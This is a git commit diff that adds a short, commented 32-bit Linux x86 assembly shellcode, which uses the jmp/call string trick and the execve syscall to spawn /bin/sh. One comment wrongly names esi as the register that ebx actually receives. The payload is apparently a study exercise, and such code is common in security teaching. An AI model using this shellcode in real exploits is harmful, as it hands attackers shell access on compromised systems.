diff options
| author | toni <toni@devlap.local> | 2014-11-04 17:42:21 +0100 |
|---|---|---|
| committer | toni <toni@devlap.local> | 2014-11-04 17:42:21 +0100 |
| commit | 701bb59b9e9b1c7c5cf3f4ca32e340ca9c503493 (patch) | |
| tree | bc0409a9061e3fc8b2e03151d0b83926551d2de7 | |
| parent | e1ee35ad724a62d7e4d1d7a4499f81759a36f9c4 (diff) | |
- added very small execve shellcode
| -rw-r--r-- | shellcode/execve.asm | 20 |
1 files changed, 20 insertions, 0 deletions
diff --git a/shellcode/execve.asm b/shellcode/execve.asm new file mode 100644 index 0000000..92f6de6 --- /dev/null +++ b/shellcode/execve.asm @@ -0,0 +1,20 @@ +BITS 32 + + +; zero out registers +xor eax,eax +xor ebx,ebx +xor ecx,ecx +cdq ; convert dword in eax to qword in edx +; do the 'string trick' +jmp short string + +code: +pop ebx ; pop the addr of the string intro esi (stack pointer register) +mov byte [ebx + 7], al ; null-terminate the string +mov al,0xb ; syscall number 0xb (11) is execve +int 0x80 ; let the kernel do the stuff + +string: +call code +db '/bin/sh' |